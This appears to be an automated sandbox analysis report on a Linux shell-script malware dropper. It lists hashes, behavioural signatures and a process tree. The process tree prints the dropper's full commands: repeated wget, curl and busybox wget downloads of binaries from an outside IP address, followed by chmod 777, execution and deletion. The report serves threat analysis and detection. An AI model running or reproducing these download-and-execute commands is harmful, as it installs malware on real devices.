Analysis
-
max time kernel
90s -
max time network
92s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh
-
Size
10KB
-
MD5
9a652a59ec3ea4f4b578b2c9f0e9c25c
-
SHA1
8c2b441f097c1f3c910ef9adb5b6816ddd60213b
-
SHA256
5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19
-
SHA512
c68e93af48af16ba88fb94f6a8a874da524ac9fd19cb25abf57ac44b802ad1c202783ccdaca8d1876e6b4fcbec0b9f2080c1b06d78f60845281d78bb3b2b2216
-
SSDEEP
192:g3P87X+A6ZsXTqpx+PiAX0kvXTqpx73P87X6M0kXf:eA0YP5/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 901 chmod 1003 chmod 880 chmod 931 chmod 943 chmod 991 chmod 997 chmod 895 chmod 919 chmod 925 chmod 763 chmod 785 chmod 832 chmod 937 chmod 967 chmod 907 chmod 973 chmod 979 chmod 985 chmod 769 chmod 826 chmod 949 chmod 961 chmod 874 chmod 913 chmod 846 chmod 889 chmod 955 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 764 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 770 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 786 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 827 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 833 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 847 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 875 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 881 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 890 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 896 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 902 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 908 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 914 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 920 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq 926 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z 932 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 938 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K 944 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg 950 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 956 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV 962 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq 968 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 974 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW 980 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL 986 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 992 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD 998 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA 1004 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4 curl File opened for modification /tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl File opened for modification /tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq curl File opened for modification /tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K curl File opened for modification /tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg curl File opened for modification /tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW curl File opened for modification /tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD curl File opened for modification /tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5 curl File opened for modification /tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9 curl File opened for modification /tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL curl File opened for modification /tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0 curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl File opened for modification /tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z curl File opened for modification /tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV curl File opened for modification /tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA curl
Processes
-
/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh/tmp/5d9193c54c990112613dee4a02fb5a3f1ba4fd5fe69ccdd2a981daa8e3766b19.sh1⤵PID:731
-
/bin/rm/bin/rm bins.sh2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:761
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:768
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:771
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:780
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:808
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:828
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:829
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:831
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:841
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:850
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:867
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:879
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:888
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:894
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:900
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:906
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:912
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:918
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:924
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:930
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:936
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:942
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:948
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:954
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:960
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:961
-
-
